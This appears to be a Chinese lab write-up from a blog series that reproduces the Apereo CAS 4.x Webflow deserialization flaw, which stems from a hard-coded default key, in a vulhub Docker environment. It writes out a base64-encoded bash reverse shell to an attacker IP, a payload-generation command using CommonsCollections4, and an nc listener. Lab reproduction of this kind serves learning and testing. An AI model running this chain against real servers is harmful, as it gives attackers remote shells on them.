码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • (六)vulhub专栏:Apereo-cas 4.x反序列化漏洞


    Apereo-cas 4.x反序列化漏洞

    影响范围

    Apereo-cas 4.1.7之前

    漏洞成因

    Webflow中使用了默认密钥changeit,代码如下:

    public class EncryptedTranscoder implements Transcoder {
        private CipherBean cipherBean;
        private boolean compression = true;
    
        public EncryptedTranscoder() throws IOException {
            BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
            bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
            bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
            bufferedBlockCipherBean.setKeyAlias("aes128");
            bufferedBlockCipherBean.setKeyPassword("changeit");
            bufferedBlockCipherBean.setNonce(new RBGNonce());
            this.setCipherBean(bufferedBlockCipherBean);
        }
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14

    漏洞利用

    环境准备

    名称IP
    攻击机192.168.75.162
    靶机192.168.75.146

    首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8080/cas/login即可

    cd vulhub-master/apereo-cas/4.1-rce
    docker-compose up -d
    
    • 1
    • 2

    image-20220720101832459

    漏洞复现

    首先准备好生成payload的工具:apereo-cas-attack-1.0-SNAPSHOT-all.jar

    工具地址:https://github.com/vulhub/Apereo-CAS-Attack/releases

    然后准备好反弹shell的命令,需要对其进行base64加密

    //反弹shell命令,注意替换为自己的
    bash -i >& /dev/tcp/192.168.75.162/6666 0>&1
    //base64加密
    YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=
    
    • 1
    • 2
    • 3
    • 4
    java  -jar  apereo-cas-attack-1.0-SNAPSHOT-all.jar  CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}"
    
    • 1

    执行完上述命令会生成一串payload,接下来新打开一个cmd窗口执行以下命令:

    nc -lvvp 6666
    
    • 1

    监听启动后我们在浏览器输入账号密码抓包,发送到重放器,替换execution的内容并发送,可以看到如下图,反弹shell成功,此漏洞利用成功

    image-20220720102209469

    image-20220720102221258

  • 相关阅读:
    ZooKeeper 避坑实践:如何调优 jute.maxbuffer
    web网页设计期末课程大作业:旅游网页主题网站设计——中国风的温泉酒店预订网(13页)HTML+CSS+JavaScript
    计算机网络学习笔记(持续学习中)
    定义头文件如何避免被重复引用
    关于Vue3 + Ts 项目 遇到 关于路径动态加载 和 组件拷贝关系问题的记录
    【C++设计模式之工厂方法模式】分析及示例
    深潜Kotlin协程(二十一):Flow 生命周期函数
    开发过程中的坑(1)
    JavaScript学习总结
    Spring中有哪几种方法获取HttpSession对象
  • 原文地址:https://blog.csdn.net/u014536801/article/details/125888002
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号